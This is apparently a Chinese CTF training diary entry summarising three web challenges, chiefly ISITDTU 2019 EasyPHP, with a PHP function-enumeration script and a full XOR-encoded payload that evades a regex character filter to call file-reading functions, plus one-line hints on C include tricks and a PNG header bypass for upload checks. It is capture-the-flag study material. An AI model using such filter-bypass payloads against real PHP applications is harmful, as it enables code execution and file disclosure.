30天打卡day3

x

day3依旧想吃炸鸡

[ISITDTU 2019]EasyPHP

写脚本查看正则过滤有哪些字符可以用，count_chars判断输入字符种类，取反绕过字母过滤

多次异或缩减可用到的字符(脚本)

!!@i结合chr拼接数字字母，字符串调用函数，trim将整数转型为字符串

异或操作详解

发现了很好用的正则匹配学习工具

查看绕过disable_function和正则匹配的可用函数脚本

<?php
$array = get_defined_functions();//返回所有内置定义函数
foreach ($array['internal'] as  $arr){
    if (preg_match('/[\x00- 0-9\'"\`$&.,|[{_defgops\x7F]+/i',$arr)){
        continue;
    }
    if(strlen(count_chars(strtolower($arr), 0x3)) > 0xd){
        continue;
    }
    echo $arr."\n";
}

超详解，用show_source或readfile读取end文件

也就是说把16个字符中挑3个用剩余十三个表达出来，这样就达到消元的目的，只用到10个字符

print_r=(%8f%8d%96%91%8b%a0%8d)^(%ff%ff%ff%ff%ff%ff%ff)
    print_r
-->((%8f%9e%96%96%8c%a0%9e)^(%ff%ff%ff%ff%ff%ff%ff)^(%ff%9c%ff%9c%9c%ff%9c)^(%ff%8f%ff%9b%9b%ff%8f))
    tnr分别替换第一列也就是sia                             替换第二列 ccc         替换第三列 ddp

((%8c%90%90%88%a0%8c%90%8a%8d%9c%8c)^(%8c%8a%90%88%a0%8c%90%8a%8d%9c%8a)^(%8c%8d%90%88%a0%8c%90%8a%8d%9c%9c)^(%ff%ff%ff%ff%ff%ff%ff%ff%ff%ff%ff))(((%8c%8c%8a)^(%8a%90%8d)^(%9c%8d%9c)^(%ff%ff%ff))(((%8c%9c%88%8c%8a%8c%8d)^(%8c%9c%8a%90%8d%90%8d)^(%8c%9c%9c%8d%9c%8a%8d)^(%ff%ff%ff%ff%ff%ff%ff))(%d1^%ff)));

[FireshellCTF2020]Caas

c语言预处理头文件包含

[HarekazeCTF2019]Avatar Uploader 1

IHDR留空绕过finfo,getimagesize